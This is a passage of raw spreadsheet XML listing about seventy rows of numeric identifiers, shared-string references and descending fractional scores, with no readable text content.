      <c r="E29691" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29691" s="2">
        <v>0.1724386724386724</v>
      </c>
    </row>
    <row r="29692" ht="15.75" customHeight="1">
      <c r="A29692" s="1">
        <v>19124.0</v>
      </c>
      <c r="B29692" s="2">
        <v>5.4762661E7</v>
      </c>
      <c r="C29692" s="2" t="s">
        <v>28541</v>
      </c>
      <c r="D29692" s="2">
        <v>1.0</v>
      </c>
      <c r="E29692" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29692" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="29693" ht="15.75" customHeight="1">
      <c r="A29693" s="1">
        <v>5670.0</v>
      </c>
      <c r="B29693" s="2">
        <v>4.6335292E7</v>
      </c>
      <c r="C29693" s="2" t="s">
        <v>28542</v>
      </c>
      <c r="D29693" s="2">
        <v>1.0</v>
      </c>
      <c r="E29693" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29693" s="2">
        <v>0.1717948717948719</v>
      </c>
    </row>
    <row r="29694" ht="15.75" customHeight="1">
      <c r="A29694" s="1">
        <v>24452.0</v>
      </c>
      <c r="B29694" s="2">
        <v>1.0934941E7</v>
      </c>
      <c r="C29694" s="2" t="s">
        <v>28543</v>
      </c>
      <c r="D29694" s="2">
        <v>1.0</v>
      </c>
      <c r="E29694" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29694" s="2">
        <v>0.1713615023474179</v>
      </c>
    </row>
    <row r="29695" ht="15.75" customHeight="1">
      <c r="A29695" s="1">
        <v>17567.0</v>
      </c>
      <c r="B29695" s="2">
        <v>5.0255844E7</v>
      </c>
      <c r="C29695" s="2" t="s">
        <v>28544</v>
      </c>
      <c r="D29695" s="2">
        <v>1.0</v>
      </c>
      <c r="E29695" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29695" s="2">
        <v>0.1706349206349207</v>
      </c>
    </row>
    <row r="29696" ht="15.75" customHeight="1">
      <c r="A29696" s="1">
        <v>13711.0</v>
      </c>
      <c r="B29696" s="2">
        <v>3.6226637E7</v>
      </c>
      <c r="C29696" s="2" t="s">
        <v>28545</v>
      </c>
      <c r="D29696" s="2">
        <v>1.0</v>
      </c>
      <c r="E29696" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29696" s="2">
        <v>0.1698872785829308</v>
      </c>
    </row>
    <row r="29697" ht="15.75" customHeight="1">
      <c r="A29697" s="1">
        <v>32148.0</v>
      </c>
      <c r="B29697" s="2">
        <v>5424315.0</v>
      </c>
      <c r="C29697" s="2" t="s">
        <v>28543</v>
      </c>
      <c r="D29697" s="2">
        <v>1.0</v>
      </c>
      <c r="E29697" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29697" s="2">
        <v>0.1697965571205008</v>
      </c>
    </row>
    <row r="29698" ht="15.75" customHeight="1">
      <c r="A29698" s="1">
        <v>17024.0</v>
      </c>
      <c r="B29698" s="2">
        <v>4.8459869E7</v>
      </c>
      <c r="C29698" s="2" t="s">
        <v>28546</v>
      </c>
      <c r="D29698" s="2">
        <v>1.0</v>
      </c>
      <c r="E29698" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29698" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="29699" ht="15.75" customHeight="1">
      <c r="A29699" s="1">
        <v>19819.0</v>
      </c>
      <c r="B29699" s="2">
        <v>5.6961054E7</v>
      </c>
      <c r="C29699" s="2" t="s">
        <v>28547</v>
      </c>
      <c r="D29699" s="2">
        <v>1.0</v>
      </c>
      <c r="E29699" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29699" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="29700" ht="15.75" customHeight="1">
      <c r="A29700" s="1">
        <v>24103.0</v>
      </c>
      <c r="B29700" s="2">
        <v>9849702.0</v>
      </c>
      <c r="C29700" s="2" t="s">
        <v>28548</v>
      </c>
      <c r="D29700" s="2">
        <v>1.0</v>
      </c>
      <c r="E29700" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29700" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="29701" ht="15.75" customHeight="1">
      <c r="A29701" s="1">
        <v>30781.0</v>
      </c>
      <c r="B29701" s="2">
        <v>4.4739123E7</v>
      </c>
      <c r="C29701" s="2" t="s">
        <v>28549</v>
      </c>
      <c r="D29701" s="2">
        <v>1.0</v>
      </c>
      <c r="E29701" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29701" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="29702" ht="15.75" customHeight="1">
      <c r="A29702" s="1">
        <v>14109.0</v>
      </c>
      <c r="B29702" s="2">
        <v>3.7767159E7</v>
      </c>
      <c r="C29702" s="2" t="s">
        <v>28550</v>
      </c>
      <c r="D29702" s="2">
        <v>1.0</v>
      </c>
      <c r="E29702" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29702" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="29703" ht="15.75" customHeight="1">
      <c r="A29703" s="1">
        <v>11619.0</v>
      </c>
      <c r="B29703" s="2">
        <v>2.3084829E7</v>
      </c>
      <c r="C29703" s="2" t="s">
        <v>28551</v>
      </c>
      <c r="D29703" s="2">
        <v>1.0</v>
      </c>
      <c r="E29703" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29703" s="2">
        <v>0.1688034188034188</v>
      </c>
    </row>
    <row r="29704" ht="15.75" customHeight="1">
      <c r="A29704" s="1">
        <v>19723.0</v>
      </c>
      <c r="B29704" s="2">
        <v>5.6612077E7</v>
      </c>
      <c r="C29704" s="2" t="s">
        <v>28552</v>
      </c>
      <c r="D29704" s="2">
        <v>1.0</v>
      </c>
      <c r="E29704" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29704" s="2">
        <v>0.1683250414593698</v>
      </c>
    </row>
    <row r="29705" ht="15.75" customHeight="1">
      <c r="A29705" s="1">
        <v>16977.0</v>
      </c>
      <c r="B29705" s="2">
        <v>4.8313138E7</v>
      </c>
      <c r="C29705" s="2" t="s">
        <v>28553</v>
      </c>
      <c r="D29705" s="2">
        <v>1.0</v>
      </c>
      <c r="E29705" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29705" s="2">
        <v>0.1675084175084176</v>
      </c>
    </row>
    <row r="29706" ht="15.75" customHeight="1">
      <c r="A29706" s="1">
        <v>13406.0</v>
      </c>
      <c r="B29706" s="2">
        <v>3.500249E7</v>
      </c>
      <c r="C29706" s="2" t="s">
        <v>28554</v>
      </c>
      <c r="D29706" s="2">
        <v>1.0</v>
      </c>
      <c r="E29706" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29706" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="29707" ht="15.75" customHeight="1">
      <c r="A29707" s="1">
        <v>18972.0</v>
      </c>
      <c r="B29707" s="2">
        <v>5.4374837E7</v>
      </c>
      <c r="C29707" s="2" t="s">
        <v>28555</v>
      </c>
      <c r="D29707" s="2">
        <v>1.0</v>
      </c>
      <c r="E29707" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29707" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="29708" ht="15.75" customHeight="1">
      <c r="A29708" s="1">
        <v>26314.0</v>
      </c>
      <c r="B29708" s="2">
        <v>1.6648721E7</v>
      </c>
      <c r="C29708" s="2" t="s">
        <v>28556</v>
      </c>
      <c r="D29708" s="2">
        <v>1.0</v>
      </c>
      <c r="E29708" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29708" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="29709" ht="15.75" customHeight="1">
      <c r="A29709" s="1">
        <v>34074.0</v>
      </c>
      <c r="B29709" s="2">
        <v>9660545.0</v>
      </c>
      <c r="C29709" s="2" t="s">
        <v>28557</v>
      </c>
      <c r="D29709" s="2">
        <v>1.0</v>
      </c>
      <c r="E29709" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29709" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="29710" ht="15.75" customHeight="1">
      <c r="A29710" s="1">
        <v>12727.0</v>
      </c>
      <c r="B29710" s="2">
        <v>3.093243E7</v>
      </c>
      <c r="C29710" s="2" t="s">
        <v>28558</v>
      </c>
      <c r="D29710" s="2">
        <v>1.0</v>
      </c>
      <c r="E29710" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29710" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="29711" ht="15.75" customHeight="1">
      <c r="A29711" s="1">
        <v>889.0</v>
      </c>
      <c r="B29711" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C29711" s="2" t="s">
        <v>28559</v>
      </c>
      <c r="D29711" s="2">
        <v>1.0</v>
      </c>
      <c r="E29711" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29711" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="29712" ht="15.75" customHeight="1">
      <c r="A29712" s="1">
        <v>11229.0</v>
      </c>
      <c r="B29712" s="2">
        <v>2.0322059E7</v>
      </c>
      <c r="C29712" s="2" t="s">
        <v>28560</v>
      </c>
      <c r="D29712" s="2">
        <v>1.0</v>
      </c>
      <c r="E29712" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29712" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="29713" ht="15.75" customHeight="1">
      <c r="A29713" s="1">
        <v>5669.0</v>
      </c>
      <c r="B29713" s="2">
        <v>4.6335292E7</v>
      </c>
      <c r="C29713" s="2" t="s">
        <v>28561</v>
      </c>
      <c r="D29713" s="2">
        <v>1.0</v>
      </c>
      <c r="E29713" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29713" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="29714" ht="15.75" customHeight="1">
      <c r="A29714" s="1">
        <v>5038.0</v>
      </c>
      <c r="B29714" s="2">
        <v>4.4290926E7</v>
      </c>
      <c r="C29714" s="2" t="s">
        <v>28562</v>
      </c>
      <c r="D29714" s="2">
        <v>1.0</v>
      </c>
      <c r="E29714" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29714" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="29715" ht="15.75" customHeight="1">
      <c r="A29715" s="1">
        <v>33331.0</v>
      </c>
      <c r="B29715" s="2">
        <v>7569733.0</v>
      </c>
      <c r="C29715" s="2" t="s">
        <v>28563</v>
      </c>
      <c r="D29715" s="2">
        <v>1.0</v>
      </c>
      <c r="E29715" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29715" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="29716" ht="15.75" customHeight="1">
      <c r="A29716" s="1">
        <v>22676.0</v>
      </c>
      <c r="B29716" s="2">
        <v>4.1777015E7</v>
      </c>
      <c r="C29716" s="2" t="s">
        <v>28564</v>
      </c>
      <c r="D29716" s="2">
        <v>1.0</v>
      </c>
      <c r="E29716" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29716" s="2">
        <v>0.1620370370370371</v>
      </c>
    </row>
    <row r="29717" ht="15.75" customHeight="1">
      <c r="A29717" s="1">
        <v>23890.0</v>
      </c>
      <c r="B29717" s="2">
        <v>8422588.0</v>
      </c>
      <c r="C29717" s="2" t="s">
        <v>28565</v>
      </c>
      <c r="D29717" s="2">
        <v>1.0</v>
      </c>
      <c r="E29717" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29717" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="29718" ht="15.75" customHeight="1">
      <c r="A29718" s="1">
        <v>33767.0</v>
      </c>
      <c r="B29718" s="2">
        <v>8644663.0</v>
      </c>
      <c r="C29718" s="2" t="s">
        <v>28566</v>
      </c>
      <c r="D29718" s="2">
        <v>1.0</v>
      </c>
      <c r="E29718" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29718" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="29719" ht="15.75" customHeight="1">
      <c r="A29719" s="1">
        <v>6430.0</v>
      </c>
      <c r="B29719" s="2">
        <v>4.8576333E7</v>
      </c>
      <c r="C29719" s="2" t="s">
        <v>28567</v>
      </c>
      <c r="D29719" s="2">
        <v>1.0</v>
      </c>
      <c r="E29719" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29719" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="29720" ht="15.75" customHeight="1">
      <c r="A29720" s="1">
        <v>909.0</v>
      </c>
      <c r="B29720" s="2">
        <v>2.2140752E7</v>
      </c>
      <c r="C29720" s="2" t="s">
        <v>28568</v>
      </c>
      <c r="D29720" s="2">
        <v>1.0</v>
      </c>
      <c r="E29720" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29720" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="29721" ht="15.75" customHeight="1">
      <c r="A29721" s="1">
        <v>20955.0</v>
      </c>
      <c r="B29721" s="2">
        <v>1.6648722E7</v>
      </c>
      <c r="C29721" s="2" t="s">
        <v>28556</v>
      </c>
      <c r="D29721" s="2">
        <v>1.0</v>
      </c>
      <c r="E29721" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29721" s="2">
        <v>0.1598290598290599</v>
      </c>
    </row>
    <row r="29722" ht="15.75" customHeight="1">
      <c r="A29722" s="1">
        <v>4998.0</v>
      </c>
      <c r="B29722" s="2">
        <v>4.417758E7</v>
      </c>
      <c r="C29722" s="2" t="s">
        <v>28569</v>
      </c>
      <c r="D29722" s="2">
        <v>1.0</v>
      </c>
      <c r="E29722" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29722" s="2">
        <v>0.1598290598290598</v>
      </c>
    </row>
    <row r="29723" ht="15.75" customHeight="1">
      <c r="A29723" s="1">
        <v>8851.0</v>
      </c>
      <c r="B29723" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C29723" s="2" t="s">
        <v>28570</v>
      </c>
      <c r="D29723" s="2">
        <v>1.0</v>
      </c>
      <c r="E29723" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29723" s="2">
        <v>0.1598079561042524</v>
      </c>
    </row>
    <row r="29724" ht="15.75" customHeight="1">
      <c r="A29724" s="1">
        <v>25695.0</v>
      </c>
      <c r="B29724" s="2">
        <v>1.4528518E7</v>
      </c>
      <c r="C29724" s="2" t="s">
        <v>28571</v>
      </c>
      <c r="D29724" s="2">
        <v>1.0</v>
      </c>
      <c r="E29724" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29724" s="2">
        <v>0.1595238095238096</v>
      </c>
    </row>
    <row r="29725" ht="15.75" customHeight="1">
      <c r="A29725" s="1">
        <v>7190.0</v>
      </c>
      <c r="B29725" s="2">
        <v>5.0573741E7</v>
      </c>
      <c r="C29725" s="2" t="s">
        <v>28572</v>
      </c>
      <c r="D29725" s="2">
        <v>1.0</v>
      </c>
      <c r="E29725" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29725" s="2">
        <v>0.1592592592592593</v>
      </c>
    </row>
    <row r="29726" ht="15.75" customHeight="1">
      <c r="A29726" s="1">
        <v>24943.0</v>
      </c>
      <c r="B29726" s="2">
        <v>1.2511136E7</v>
      </c>
      <c r="C29726" s="2" t="s">
        <v>28573</v>
      </c>
      <c r="D29726" s="2">
        <v>1.0</v>
      </c>
      <c r="E29726" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29726" s="2">
        <v>0.1590909090909091</v>
      </c>
    </row>
    <row r="29727" ht="15.75" customHeight="1">
      <c r="A29727" s="1">
        <v>28369.0</v>
      </c>
      <c r="B29727" s="2">
        <v>2.6042021E7</v>
      </c>
      <c r="C29727" s="2" t="s">
        <v>28574</v>
      </c>
      <c r="D29727" s="2">
        <v>1.0</v>
      </c>
      <c r="E29727" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29727" s="2">
        <v>0.1590277777777778</v>
      </c>
    </row>
    <row r="29728" ht="15.75" customHeight="1">
      <c r="A29728" s="1">
        <v>33650.0</v>
      </c>
      <c r="B29728" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C29728" s="2" t="s">
        <v>28575</v>
      </c>
      <c r="D29728" s="2">
        <v>1.0</v>
      </c>
      <c r="E29728" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29728" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="29729" ht="15.75" customHeight="1">
      <c r="A29729" s="1">
        <v>14616.0</v>
      </c>
      <c r="B29729" s="2">
        <v>4.0266284E7</v>
      </c>
      <c r="C29729" s="2" t="s">
        <v>28576</v>
      </c>
      <c r="D29729" s="2">
        <v>1.0</v>
      </c>
      <c r="E29729" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29729" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="29730" ht="15.75" customHeight="1">
      <c r="A29730" s="1">
        <v>32019.0</v>
      </c>
      <c r="B29730" s="2">
        <v>5.3508548E7</v>
      </c>
      <c r="C29730" s="2" t="s">
        <v>28577</v>
      </c>
      <c r="D29730" s="2">
        <v>1.0</v>
      </c>
      <c r="E29730" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29730" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="29731" ht="15.75" customHeight="1">
      <c r="A29731" s="1">
        <v>15061.0</v>
      </c>
      <c r="B29731" s="2">
        <v>4.1698711E7</v>
      </c>
      <c r="C29731" s="2" t="s">
        <v>28578</v>
      </c>
      <c r="D29731" s="2">
        <v>1.0</v>
      </c>
      <c r="E29731" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29731" s="2">
        <v>0.1581790123456791</v>
      </c>
    </row>
    <row r="29732" ht="15.75" customHeight="1">
      <c r="A29732" s="1">
        <v>7075.0</v>
      </c>
      <c r="B29732" s="2">
        <v>5.0251234E7</v>
      </c>
      <c r="C29732" s="2" t="s">
        <v>28579</v>
      </c>
      <c r="D29732" s="2">
        <v>1.0</v>
      </c>
      <c r="E29732" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29732" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29733" ht="15.75" customHeight="1">
      <c r="A29733" s="1">
        <v>14920.0</v>
      </c>
      <c r="B29733" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C29733" s="2" t="s">
        <v>28580</v>
      </c>
      <c r="D29733" s="2">
        <v>1.0</v>
      </c>
      <c r="E29733" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29733" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29734" ht="15.75" customHeight="1">
      <c r="A29734" s="1">
        <v>17691.0</v>
      </c>
      <c r="B29734" s="2">
        <v>5.0514183E7</v>
      </c>
      <c r="C29734" s="2" t="s">
        <v>28581</v>
      </c>
      <c r="D29734" s="2">
        <v>1.0</v>
      </c>
      <c r="E29734" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29734" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29735" ht="15.75" customHeight="1">
      <c r="A29735" s="1">
        <v>23776.0</v>
      </c>
      <c r="B29735" s="2">
        <v>7585498.0</v>
      </c>
      <c r="C29735" s="2" t="s">
        <v>28582</v>
      </c>
      <c r="D29735" s="2">
        <v>1.0</v>
      </c>
      <c r="E29735" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29735" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29736" ht="15.75" customHeight="1">
      <c r="A29736" s="1">
        <v>27146.0</v>
      </c>
      <c r="B29736" s="2">
        <v>2.0770109E7</v>
      </c>
      <c r="C29736" s="2" t="s">
        <v>28583</v>
      </c>
      <c r="D29736" s="2">
        <v>1.0</v>
      </c>
      <c r="E29736" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29736" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29737" ht="15.75" customHeight="1">
      <c r="A29737" s="1">
        <v>30138.0</v>
      </c>
      <c r="B29737" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C29737" s="2" t="s">
        <v>28584</v>
      </c>
      <c r="D29737" s="2">
        <v>1.0</v>
      </c>
      <c r="E29737" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29737" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29738" ht="15.75" customHeight="1">
      <c r="A29738" s="1">
        <v>33334.0</v>
      </c>
      <c r="B29738" s="2">
        <v>7585497.0</v>
      </c>
      <c r="C29738" s="2" t="s">
        <v>28585</v>
      </c>
      <c r="D29738" s="2">
        <v>1.0</v>
      </c>
      <c r="E29738" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29738" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="29739" ht="15.75" customHeight="1">
      <c r="A29739" s="1">
        <v>2506.0</v>
      </c>
      <c r="B29739" s="2">
        <v>3.3954486E7</v>
      </c>
      <c r="C29739" s="2" t="s">
        <v>28586</v>
      </c>
      <c r="D29739" s="2">
        <v>1.0</v>
      </c>
      <c r="E29739" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29739" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="29740" ht="15.75" customHeight="1">
      <c r="A29740" s="1">
        <v>13762.0</v>
      </c>
      <c r="B29740" s="2">
        <v>3.6509805E7</v>
      </c>
      <c r="C29740" s="2" t="s">
        <v>28587</v>
      </c>
      <c r="D29740" s="2">
        <v>1.0</v>
      </c>
      <c r="E29740" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29740" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="29741" ht="15.75" customHeight="1">
      <c r="A29741" s="1">
        <v>32962.0</v>
      </c>
      <c r="B29741" s="2">
        <v>6515153.0</v>
      </c>
      <c r="C29741" s="2" t="s">
        <v>28588</v>
      </c>
      <c r="D29741" s="2">
        <v>1.0</v>
      </c>
      <c r="E29741" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29741" s="2">
        <v>0.1564814814814815</v>
      </c>
    </row>
    <row r="29742" ht="15.75" customHeight="1">
      <c r="A29742" s="1">
        <v>13556.0</v>
      </c>
      <c r="B29742" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C29742" s="2" t="s">
        <v>28589</v>
      </c>
      <c r="D29742" s="2">
        <v>1.0</v>
      </c>
      <c r="E29742" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29742" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="29743" ht="15.75" customHeight="1">
      <c r="A29743" s="1">
        <v>13175.0</v>
      </c>
      <c r="B29743" s="2">
        <v>3.4008577E7</v>
      </c>
      <c r="C29743" s="2" t="s">
        <v>28590</v>
      </c>
      <c r="D29743" s="2">
        <v>1.0</v>
      </c>
      <c r="E29743" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29743" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="29744" ht="15.75" customHeight="1">
      <c r="A29744" s="1">
        <v>15975.0</v>
      </c>
      <c r="B29744" s="2">
        <v>4.4848824E7</v>
      </c>
      <c r="C29744" s="2" t="s">
        <v>28591</v>
      </c>
      <c r="D29744" s="2">
        <v>1.0</v>
      </c>
      <c r="E29744" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29744" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="29745" ht="15.75" customHeight="1">
      <c r="A29745" s="1">
        <v>16361.0</v>
      </c>
      <c r="B29745" s="2">
        <v>4.6114878E7</v>
      </c>
      <c r="C29745" s="2" t="s">
        <v>28592</v>
      </c>
      <c r="D29745" s="2">
        <v>1.0</v>
      </c>
      <c r="E29745" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29745" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="29746" ht="15.75" customHeight="1">
      <c r="A29746" s="1">
        <v>19126.0</v>
      </c>
      <c r="B29746" s="2">
        <v>5.4762661E7</v>
      </c>
      <c r="C29746" s="2" t="s">
        <v>28593</v>
      </c>
      <c r="D29746" s="2">
        <v>1.0</v>
      </c>
      <c r="E29746" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29746" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="29747" ht="15.75" customHeight="1">
      <c r="A29747" s="1">
        <v>20781.0</v>
      </c>
      <c r="B29747" s="2">
        <v>1.5030951E7</v>
      </c>
      <c r="C29747" s="2" t="s">
        <v>28594</v>
      </c>
      <c r="D29747" s="2">
        <v>1.0</v>
      </c>
      <c r="E29747" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29747" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="29748" ht="15.75" customHeight="1">
      <c r="A29748" s="1">
        <v>5742.0</v>
      </c>
      <c r="B29748" s="2">
        <v>4.6626831E7</v>
      </c>
      <c r="C29748" s="2" t="s">
        <v>28595</v>
      </c>
      <c r="D29748" s="2">
        <v>1.0</v>
      </c>
      <c r="E29748" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29748" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="29749" ht="15.75" customHeight="1">
      <c r="A29749" s="1">
        <v>25381.0</v>
      </c>
      <c r="B29749" s="2">
        <v>1.3655174E7</v>
      </c>
      <c r="C29749" s="2" t="s">
        <v>28596</v>
      </c>
      <c r="D29749" s="2">
        <v>1.0</v>
      </c>
      <c r="E29749" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29749" s="2">
        <v>0.1540084388185654</v>
      </c>
    </row>
    <row r="29750" ht="15.75" customHeight="1">
      <c r="A29750" s="1">
        <v>13144.0</v>
      </c>
      <c r="B29750" s="2">
        <v>3.3765995E7</v>
      </c>
      <c r="C29750" s="2" t="s">
        <v>28597</v>
      </c>
      <c r="D29750" s="2">
        <v>1.0</v>
      </c>
      <c r="E29750" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29750" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="29751" ht="15.75" customHeight="1">
      <c r="A29751" s="1">
        <v>17868.0</v>
      </c>
      <c r="B29751" s="2">
        <v>5.1021774E7</v>
      </c>
      <c r="C29751" s="2" t="s">
        <v>28598</v>
      </c>
      <c r="D29751" s="2">
        <v>1.0</v>
      </c>
      <c r="E29751" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29751" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="29752" ht="15.75" customHeight="1">
      <c r="A29752" s="1">
        <v>22489.0</v>
      </c>
      <c r="B29752" s="2">
        <v>3.707212E7</v>
      </c>
      <c r="C29752" s="2" t="s">
        <v>28599</v>
      </c>
      <c r="D29752" s="2">
        <v>1.0</v>
      </c>
      <c r="E29752" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29752" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="29753" ht="15.75" customHeight="1">
      <c r="A29753" s="1">
        <v>27738.0</v>
      </c>
      <c r="B29753" s="2">
        <v>2.308052E7</v>
      </c>
      <c r="C29753" s="2" t="s">
        <v>28600</v>
      </c>
      <c r="D29753" s="2">
        <v>1.0</v>
      </c>
      <c r="E29753" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29753" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="29754" ht="15.75" customHeight="1">
      <c r="A29754" s="1">
        <v>32599.0</v>
      </c>
      <c r="B29754" s="2">
        <v>5818464.0</v>
      </c>
      <c r="C29754" s="2" t="s">
        <v>28601</v>
      </c>
      <c r="D29754" s="2">
        <v>1.0</v>
      </c>
      <c r="E29754" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29754" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="29755" ht="15.75" customHeight="1">
      <c r="A29755" s="1">
        <v>23094.0</v>
      </c>
      <c r="B29755" s="2">
        <v>5.0738303E7</v>
      </c>
      <c r="C29755" s="2" t="s">
        <v>28602</v>
      </c>
      <c r="D29755" s="2">
        <v>1.0</v>
      </c>
      <c r="E29755" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29755" s="2">
        <v>0.152557319223986</v>
      </c>
    </row>
    <row r="29756" ht="15.75" customHeight="1">
      <c r="A29756" s="1">
        <v>31509.0</v>
      </c>
      <c r="B29756" s="2">
        <v>5.0738302E7</v>
      </c>
      <c r="C29756" s="2" t="s">
        <v>28603</v>
      </c>
      <c r="D29756" s="2">
        <v>1.0</v>
      </c>
      <c r="E29756" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29756" s="2">
        <v>0.152557319223986</v>
      </c>
    </row>
    <row r="29757" ht="15.75" customHeight="1">
      <c r="A29757" s="1">
        <v>4425.0</v>
      </c>
      <c r="B29757" s="2">
        <v>4.2307925E7</v>
      </c>
      <c r="C29757" s="2" t="s">
        <v>28604</v>
      </c>
      <c r="D29757" s="2">
        <v>1.0</v>
      </c>
      <c r="E29757" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29757" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="29758" ht="15.75" customHeight="1">
      <c r="A29758" s="1">
        <v>33640.0</v>
      </c>
      <c r="B29758" s="2">
        <v>8375347.0</v>
      </c>
      <c r="C29758" s="2" t="s">
        <v>28605</v>
      </c>
      <c r="D29758" s="2">
        <v>1.0</v>
      </c>
      <c r="E29758" s="3" t="s">
        <v>28514</v>
